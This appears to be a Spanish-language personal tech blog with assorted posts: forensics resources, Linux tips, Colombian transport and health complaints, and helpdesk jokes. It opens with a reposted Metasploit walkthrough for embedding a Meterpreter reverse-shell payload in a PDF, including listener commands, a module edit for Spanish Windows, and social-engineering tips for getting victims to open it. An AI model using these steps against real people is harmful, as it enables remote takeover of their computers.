Embebiendo un Ejecutable dentro de un PDF con MetaSploit

Articulo muy interezante encontrado via kunfoosion por eso lo comparto igual al final dejo el link para que visiten su blog :D

-------------------------------------------------------------------------------------------------

En este artículo, vamos a ver como embeber un archivo ejecutable ".exe", dentro de un archivo PDF, utilizando el módulo "adobe_pdf_embedded_exe" de MetaSploit.

Leyendo el blog de F-Secure, me encontré con un post sobre PDF maliciosos que estaban siendo utilizados para ataques de espionaje. Al ser abiertos, dropeaban y corrían un archivo ejecutable, en este caso un Poison Ivy que luego se conectaba a una IP de Singapore.

MetaSploit: adobe_pdf_embedded_exe

Para testear el comportamiento de nuestros usuarios, ante una amenaza similar a esta, podemos replicar este ataque con el módulo "adobe_pdf_embedded_exe" de MetaSploit, en donde vamos a embeber un archivo ejecutable ".exe", o un payload de MetaSploit, dentro de un archivo PDF.

Por supuesto vamos a necesitar realizar un poco de ingeniería social, primero para que la víctima abra el PDF que le enviamos, y luego, para que ignore el warning de seguridad que aparecerá cuando se intente ejecutar el payload malicioso.

Lo interesante del módulo "adobe_pdf_embedded_exe", es que nos permitirá embeber el payload en cualquier PDF existente, lo que nos allanará el camino para realizar la ingeniería social. Por ejemplo, podríamos buscar PDF's existentes de una víctima en particular en Google:

Otra cosa a tener en cuenta, es que este módulo tiene rank de Excellent, por lo que es una buena opción, ante otros exploits para client side attacks que no son tan estables.

Embebiendo un Payload de MetaSploit en un PDF

Para embeber un payload, simplemente lo configuramos como a cualquier otro exploit, solamente debemos tener en cuenta que en la opción "INFILENAME" vamos a poner el path al archivo PDF que queremos utilizar, y en la opción "FILENAME", el nombre del nuevo archivo PDF con el payload embebido:

use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/programa.pdf
set FILENAME evil.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.102
exploit

Luego deberemos dejar escuchando por la conexión reversa que se va a generar una vez que la víctima abra el PDF:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.102 E

Cuando la víctima abra el archivo PDF, verá un warning:

Al momento de presion "Open", el payload será dropeado en el sistema, y un script intentará correrlo. Como el target de este módulo es Windows XP SP3 English, vemos en el warning que el payload es buscado dentro de "Desktop", "My Documents" y "Documents".

Para que funcione con un XP en español, debemos agregar en el código del módulo, los directorios "Escritorio" y "Mis Documentos", y volver a generar el PDF:

# editamos el módulo:
/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

# reemplazamos la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents" ]

# por la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]

Ahora si, se ejecutará el payload, y como podemos ver, lo hicimos con un Windows XP SP2 en Español:

Si vimos atentamente el warning, pudimos apreciar que al ejecutar el payload dropeado, lo hace de esta forma: "start programa.pdf".

El archivo que enviamos a la víctima se llamaba "evil.pdf", cuando dropeo el payload lo hizo con el nombre "programa.pdf", como el nombre del PDF verdadero que configuramos oportunamente. En realidad, "programa.pdf" es un archivo ".exe", con el payload de Meterpreter, pero como el comando "start" puede correr un ejecutable, sin importar la extensión que posea, esta hecho de esta forma para que el ataque pase un poco más desapercibido.

Embebiendo un Ejecutable en un PDF

Para embeber un archivo ejecutable dentro de nuestro PDF, simplemente configuramos la opción "EXENAME". En este caso estamos embebiendo la famosa calculadora de Windows "calc.exe":

set EXENAME /tmp/calc.exe
set INFILENAME /tmp/programa.pdf
exploit

Si bien el PAYLOAD no debería ser necesario configurarlo, ya que no estamos embebiendo un payload sino el ejecutable "calc.exe", por alguna razón si no lo configuramos no nos deja seguir.

set PAYLOAD windows/shell/bind_tcp

Cuando la víctima abra el archivo PDF, verá el warning pero ya con los directorios que agregamos:

Una vez que la víctima presione "Open", se correrá el archivo ejecutable que embebimos, el famoso "calc.exe":

Eso es todo amigos :-)

fuente:

http://kungfoosion.blogspot.com/2010/02/embebiendo-un-ejecutable-dentro-de-un.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+KungFooSion+%28KungFooSion%29

Auditar de una forma rápida la seguridad de la configuración de distribuciones Linux.

Con la herramienta Yasat podemos auditar de una forma rápida la seguridad de la configuración de distribuciones Linux. Es una herramienta muy potente y tremendamente eficaz.

Puede auditar configuraciones de las distribuciones:

• Gentoo.
• Debian.
• Ubuntu.
• FreeBSD.
• OpenBSD.

Yasat chequea la configuración en busca de fallos de seguridad en:

• Configuración del Kernel.
• Configuración de red.
• Actualización de paquetes.
• Cuentas de usuario.
• Apache.
• Bind DNS.
• PHP.
• Mysql.
• Openvpn.
• Snmpd.
• Tomcat.
• Vsftpd.
• Xinetd.

Yasat es una herramienta ideal para los que dan sus primeros pasos en Linux y quieren implementar sistemas seguros. Pero también es útil para usuarios avanzados, porque siempre se puede escapar algún detalle y con un método de chequeo tan rápido vale la pena utilizarlo.

Más información de Yasat y descarga:
http://yasat.sourceforge.net/

FUENTE:
http://vtroger.blogspot.com/2010/01/auditar-de-una-forma-rapida-la.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+GuruDeLaInformtica+%28Guru+de+la++inform%C3%A1tica%29

Vino Linuxero

¿Brindamos?

Encontrado via:

http://chistesgeeks.com/2010/02/18/vino-linuxero/

TIM ‏(transporte integrado de manizales)

Que es el tim?

Segun la pagina oficial tim es:

TRANSPORTE INTEGRADO DE MANIZALES, TIM S.A. es una empresa industrial y comercial del estado, que tiene como misión la planeación, gestión, control e integración de los componentes del servicio público colectivo de pasajeros en Manizales.

TIM S.A. es el Ente Gestor, encargado de la coordinación y optima operación del Sistema Estratégico de Transporte de Manizales y Villamaría y tiene como objetivo el mejoramiento de la calidad de vida de todos los ciudadanos a través de la satisfacción de sus necesidades de movilización.

TIM S.A. es además una empresa con la capacidad y conocimiento para prestar servicios relacionados con la actividad del Transporte Público como asesorías para el desarrollo e implementación de sistemas de transporte y estudios de movilidad y transporte entre otros.

Que novedad ofrece?

CARACTERÍSTICAS DEL TRANSBORDO:

• Los transbordos se podrán realizar en cualquier tipología del sistema ya sea cable, microbús, bus o buseta.
• Se deberá pagar el excedente cuando hay un cambio de un vehículo de menor tarifa a uno de mayor valor.
• Ejemplo: Usted inicia su recorrido en un vehículo de una tarifa de $1.200 y hace transbordo u otro de $1.300, sólo será descontando $100 de su tarjeta inteligente TIM, que corresponde al excedente del pasaje.
• El tiempo que se tiene para transbordar será de 35 minutos a partir de pasar por primera vez la tarjeta frente al validador.

Bueno dejando a un lado las definiciones dejare el siguiente texto que llego a mi correo y como es costumbre quiero compartirlo con ustedes amigos.

----------------------------------------------------------------------------------------------

OJO VIVO CIUDADANIA DE MANIZALES Y VILLAMARIA

CON EL FAMOSO TIM NUEVAMENTE A LA CIUDADANIA DE MANIZALES LE VAN A METER GATO POR LIEBRE Y NO ES LA PRIMERA VEZ. ¿QUE PASO CON LA SEGURIDAD CIUDADANA? QUE IMPLANTO EL ANTERIOR Y COMPROMETIDO DE INTEGRAMOS LUIS ROBERTO RIVAS.

LA TARJETA INTELIGENTE DENOMINADA "JUAN MANUEL LLANOS Y SUSUERTE" VALE $3.065 PESOS C/U, UN SIMPLE PEDAZO DE PLASTICO, QUE MAL MULTIPILICADO POR 100.000 USUARIOS NOS DA LA MODICA SUMA DE $306.000.000 MILLONES DE PESOS. PARA QUIEN ES ESTA MODICA SUMA? Y CON EL PASAR DE LOS DIAS UN IMPUESTO ADICIONAL POR LA RECARGA.NO OLVIDEN QUE NOS HIZO ESTE SEÑOR CUANDO FUE GERENTE DE EMTELSA.

EL COSTO DEL TRANSPORTE SUBIO $200 PESOS. QUE SIGNIFICA ENTRE UN 16% Y 25%, CUANDO EL SALARIO MINIMO SUBIO ESCASOS $15.OOO PESOS. Y TODO ESTO CON LA COMPLACENCIA DE UN CONCEJO DE MANIZALES DE PAPEL.

NUEVAMENTE NOS VAN A METER LOS DEDOS EN LA JETA. ESOS NOS PASA POR SER TAN BOLUDOS.

HJF

-----------------------------------------------------------------------------------------------

ACLARO: esto no lo escribi YO para no tener problemas despues....

Quiero expresar mis experiencias el dia de ayer y hoy con respecto al transporte.

1. El costo esta muy alto es un aumento indebido..acaso somos una ciudad grande que se puede dar este lujo?

2.Esta situacion paso varias veces el dia de hoy.... Por pasar varias veces la tarjeta se le cobro 2 y 3 pasages a la misma persona dejando sin dinero para volver al origen.... donde quedo los supuestos 100 pesos que descontaban en el transborde? y de no ser el caso quien hace la devolucion del dinero perdido mientras la maquina intentaba registrar la tarjeta? o ya me robaron la platica...

3. Si la tarjeta se daña se me pierde la platica que tengo ¿

4. Si al vehiculo se le daña el lector de tarjetas me toca esperar otro... suponiendo que era el ultimo ahora que hago? taxi?.(esto paso hoy).

5. Porque pagamos nosotros esto sabiendo fue el alcande quien queria ?.

6. porque al pueblo nunca lo escuchan¿?.

7. Que pasa con la platica que se pierde(al momento de registrarla varias veces y/o al dañarse la tarjeta).

8. Que paso con la preparacion a los conductores? ayer hubo enfrentamientos de los ciudadanos con los conductores por no decirles como funcionan pero lo que no saben es que a ellos nunca los prepararon.

9. Las nuevas rutas que? a nadie los prepararon para esto? almenos si no tiene dinero para comprar la patria y ver las rutas.......o un acceso a internet para ver las rutas en una presentacion ppt que solo lo entiende el que hizo eso, que pasa con el manual de usuario?????.

10. Que pasa con las rutas eliminadas? les tocara andar a los ciudadanos sin rutas? o pagar mas.

Estas son algunas de las reflexiones que hago el dia de hoy con respecto a las experiencias vividas y si no han notado nadie las responde.

OJO no doy opinion sobre nada solo expongo mis dudas al respecto y espere que en el transcurso de los dias se vayan aclarando.

Solo digo que se apresuraron mucho con este nuevo sistema y si bien es sabido todo nuevo cambio culturan se debe hacer lento(mucho mas cuando hay poblacion vulnerable a la tecnologia)

saludos roboticos

desistalar programas que no dejan borrarse en ubuntu

Bueno estaba instalando paquetes desde consola con dpkg donde me salio errores de dependencia y adivinen? claro se jodio el gestor de paquetes.... me dice para desistalar debe reinstalar pero como espera que haga eso? xD.

En todo caso la solucion es mas sencilla. vamos a esta direccion


/var/lib/dpkg/info/nombredelarchivo.postrm

y lo renombramos

simplemente hago esto

mv /var/lib/dpkg/info/contalinex.postrm /root

y listo ya lo desistalamos :D

claro que debe existir soluciones mas tecnicas pero igual esto me recordo lo malo que es windows y ubuntu xD.

saludos roboticoss

certificaciones de analisis forense

CISSP - Certified Information Systems Security Professional

GCFA - GIAC Certified Forensics Analyst

CHFI - Certified Hacking Forensic Investigator

CCE - Certified Computer Examiner

CCFT - Certified Computer Forensic Technician

EnCE - EnCase Certified Examiner

ACE - AccessData Certified Examiner

CPE - Certified ProDiscover Examiner

Fuente:

http://delfirosales.blogspot.com/2009/03/certificaciones-de-analisis-forense.html

Oracle forensic

Esta es una entrada del blog de delphi la cual es una excelente guia cuando buscamos algo relacionado con forensic oracle asi que dejo la entrada .
-----------------------------------------------------------------------------------------------
Cuando hablamos de análisis forense de base de datos Oracle, estamos hablando de David Litchfield, que investigo y desarrollo herramientas para el análisis de Oracle desde el punto de vista forense.

David Litchfield es un reconocido experto en seguridad, que en el 2003 fue reconocido por la Revista Information Security Magazine como el mejor cazador de bugs. Su trabajo se centra en el descubrimiento y publicación de vulnerabilidades, en especial vulnerabilidades en bases de datos, la mayoría de las vulnerabilidades que ha encontrado son de productos de Microsoft y Oracle.

Él es el autor de Oracle Forensics Using Quisix, The Oracle Hacker's Handbook: Hacking and Defending Oracle, The Database Hacker's Handbook: Defending Database Servers, y SQL Server Security y es co-autor de The Shellcoder's Handbook: Discovering and Exploiting Security Holes.

El ha documentado en una serie de papers de cómo realizar un análisis forense de un servidor de base de datos comprometido, estos papers pueden ser de mucha utilidad para un examinador forense. Oracle Forensics Parts 1 to 7

Oracle Forensics

• Since the state of California passed the Database Security Breach Notification Act (SB 1386) in 2003 another 34 states have passed similar legislation with more set to follow.
  

• In January 2007 TJX announced they had suffered a database security breach with 45.6 million credits card details stolen – the largest known breach so far.
  

• In 2006 there were 335 publicized breaches in the U.S.; in 2005 there were 116 publicized breaches; between 1st January and March 31st of 2007, a 90 day period, there have been 85 breaches publicized.
  

• Never has Oracle forensics and incident response been so important. These papers should help forensic examiners and incident responders to find evidence after a database intrusion has occured.
  

Oracle Forensics Parts 1 to 7

También puedes comprobar algunas de sus presentaciones y ponencias sobre el tema en este enlace. http://www.databasesecurity.com/oracle-forensics.htm

Hay pocas personas que trabajan en este campo además de David Litchfield, podemos hacer referencia a Paul M. Wright, autor del primer Libro Oracle Forensics: Oracle Security Best Practices. Puedes comprobar su blog en este enlace. http://www.oracleforensics.com/wordpress

Fuente:
http://delfirosales.blogspot.com/2009/06/oracle-forensics.html

Viva uribe

Asi titula el ultimo correo que he recivido en el dia de hoy :D como siempre les comparto cosas que me paresen ingeniosas y creativas en este caso es la realidad reflejada en situaciones cotidianas.

----------------------------------------------------------------------------------------------

- En un barrio de Colombia, un niño regresa de la escuela a su casa, cansado y hambriento y le pregunta a su mamá:

-Mamá, ¿qué hay de comer?
-Nada, mijo.
El niño mira hacia el loro que tienen y pregunta:
- Mamá, ¿por qué no nos comemos al loro con arroz?
- No hay arroz.
- ¿Y loro al horno?
- No hay gas.
- ¿Y loro en la parrilla eléctrica?
- No hay electricidad.
- ¿Y loro frito?
- No hay aceite.

El loro contentísimo gritó: ¡¡¡ VIVA URIIIIIBE... HIJUEPUTAAAAAAAAAAAA!!!!


NOTA: lo que siempre aclaro... No tengo propiedad sobre lo aqui escrito tambien si esto afecta su creencia politica debe abstenerse a leerlo ya que el blog trata de buscar tener una mente abierta para poder entender este mundo binario matematico xD.

saludos roboticos

Objetos OLE

Ya existe una entrada relacionada con el tema pero en esta explicare que son y como pueden realizar este "ataque" manualmente.

Este documento lo escribi para wow.sinfocol.org como ayuda educativa para el wargame asi que les recomiendo que se den la pasadita y se entretengan un rato.

---------------------------------------------------------------------------------------------------

Basicamente doy una introduccion de que son los objetos OLE y como trabajarlos, en este caso doy un ejemplo practico con el programa mergestreams.
Tambien busco dar una vision de como detectar esta tecnica y como estamos actualmente frente a una situacion de fuga de informacion.

Aqui dejo el link http://www.mediafire.com/?mmjm1i4xjoj de descarga

Formato PDF

Mirror:

http://www.phyrexianarena.com/wow/viewtopic.php?f=87&t=78

saludos roboticos

fotos comicas de la situacion colombiana

Estas imagenes me llegaron al correo debo decir que son muy creativas.

Aclaro no tengo autoria sobre ellas solo las comparto asi como las compartieron conmigo asi que gracias maria por el correo me hizo reir mucho :D(reir en el sentido de tristesa y de burla xD).

Si estas imagenes no son de su agrado es que apoyan el mandato de la U yo no tengo preferencias politicas y no las tendre asi que les pido que no las vean.

LINK DE DESCARGA

mediafire

NOTA: subi todo junto porque me parese tedioso subir cada una si alguien quiere se le agradece.
gracias por el aviso diablo:D

saludos roboticos

Y la salud de la poblacion colombiana?

Muchos colombianos (pobres) estamos preocupados por la nueva situacion de la salud colombiana donde aparte del descuento que sale de nuestro sueldo tambien debemos pagar el 50% de lo equivalente al costo del "tratamiento".

Hasta hace poco la unica manera de que el pobre pudiera tener una atencion medica(tratamiento entre ellos la medicina) era por medio de demanda pero ahora ya estan prohibidas por esta razon pienso y ahora que? si no tengo billete me muero? y si me muero donde me entierran si no tengo billete para pagar el puesto en el cementerio.

Bueno no quiero hablar por mi cuenta ya que serian palabras sin valor asi que dejo algunos links para que lean todo lo que esta pasando y reflexionen.

Link 1
Link 2

Existe un correo mas explicativo de todo lo que ocurre asi que en estos dias tratare de postearlo porque los colombianos somos todos y como veran el salario no aumento nada como para dar la mitad de un tratamiento....

Sera alguna alianza entre los bancos y el gobierno? donde para un tratamiento nos obligen indirectamente a generar un prestamo. Esto ya lo analisa cada uno.

Saludos roboticos

Porque los informaticos nos sentimos incomprendidos

Bueno hay muchas razones por las cuales pienso en el titulo de esta entrada pero hoy vamos a ver el ejemplo de algunas cosas que personalmente me ha pasado.....
Esto me llego al correo pero ya es viejito no recuerdo donde lo vi asi que para no volverlo a olvidar los comparto con ustedes :D.


---------------------------------------------------------------------------------------------------

Conversaciones reales registradas entre un Servicio de Asistencia Técnica y usuarios de equipos informáticos.

Caso 1
Técnico de Servicio: ¿Qué computador tiene?
Usuario: Uno blanco
Técnico de Servicio: (Silencio)

Caso 2
Usuaria: ¡Hola!. No puedo sacar el disquete de la disquetera.
Técnico de Servicio: ¿Ha intentado apretar el botón?
Usuaria: Sí, claro, está como pegado...
Técnico de Servicio: Eso no suena bien, tomaré nota.
Usuaria: No... Espera... No había metido el disquete... está todavía en la mesa..., gracias.

Caso 3
Técnico de Servicio: Haga clic sobre el ícono de 'Mi PC', a la izquierda de la pantalla.
Usuario: ¿Su izquierda o mi izquierda?

Caso 4
Técnico de Servicio: Buenos días, ¿en qué puedo ayudarle?
Usuaria: Hola, no puedo imprimir.
Técnico de Servicio: Por favor dé clic en 'inicio' y...
Usuaria: Escuche, no empiece con tecnicismos, no soy experta en computadores. ¡Coño!

Caso 5
Usuaria: Hola, buenas tardes, no puedo imprimir, cada vez que lo intento dice 'No se encuentra impresora'. He cogido incluso la impresora, la he colocado en frente del monitor pero el ordenador todavía dice que no la puede encontrar.

Caso 6
Usuaria: Tengo problemas para imprimir en rojo.
Técnico de Servicio: ¿Tiene una impresora a color?
Usuaria: No, la mía es blanca.

Caso 7
Técnico de Servicio: ¿Qué ve en su monitor ahora mismo?
Usuaria: Un osito de peluche que mi novio me compró.

Caso 8
Técnico de Servicio: Ahora, pulse F8..
Usuaria: No funciona.
Técnico de Servicio: ¿Qué hizo exactamente?
Usuaria: Presionar la F 8 veces como me dijiste, pero no ocurre nada.

Caso 9
Usuaria: Mi teclado no quiere funcionar.
Técnico de Servicio: ¿Está segura de que está conectado?
Usuaria: No lo sé. No alcanzo la parte de atrás.
Técnico de Servicio: Coja el teclado y dé diez pasos hacia atrás.
Usuaria: ok
Técnico de Servicio: ¿El teclado sigue con usted?
Usuaria: Sí
Técnico de Servicio: Eso significa que el teclado no está conectado ¿Hay algún otro teclado?
Usuaria: Sí, hay otro aquí. Huy,.... ¡¡¡Este sí funciona!!!

Caso 10
Técnico de Servicio: Tu password es 'a' minúscula de andamio, V mayúscula de Víctor, y el número 7...
Usuaria: ¿7 en mayúscula o minúscula?

Caso 11
Usuaria: No puedo conectarme a Internet, aparece error de clave.
Técnico de Servicio: ¿Está segura de que está utilizando el password correcto?
Usuaria: Sí, estoy segura, ví a mi esposo escribirlo.
Técnico de Servicio: ¿Me puede decir cuál era el password?
Usuaria: 5 asteriscos. Los ví claritos ....

Caso 12
Usuaria: Tengo un grave problema. Un amigo me puso un protector de pantalla, pero cada vez que muevo el ratón desaparece... Que hagó para que no desaparezca?
Técnico de Servicio: (Pensamiento): 'Que tan bruta' .

Caso 13
Usuaria: No logro encontrar el simbolito para abrir el Word.
Técnico de Servicio: Mire en el escritorio.¿qué tiene ahí?
Usuaria: Muchos papeles, mi bolso y mi celular.

Caso 14
Usuaria: No logro visualizar el documento de word que tenia abierto ...
Técnico de Servicio: Fijese en la parte inferior y abra la ventana que se encuentra minimizada por favor ...
Usuaria: Sr. técnico, mi ventana la tengo abierta porque está haciendo mucho calor ... no me crea tan bruta por favor ...

Caso 15
Usuaria: Cómo hago para escuchar un cd de música?
Técnico de Servicio: Haga clic en MI PC.
Usuaria: En el mío o en el suyo?

---------------------------------------------------------------

Esto es a nivel informatico pronto hare una entrada a nivel "hacker" y/o seguridad.

Saludos a vivi por el correo :D.

Y saludos roboticos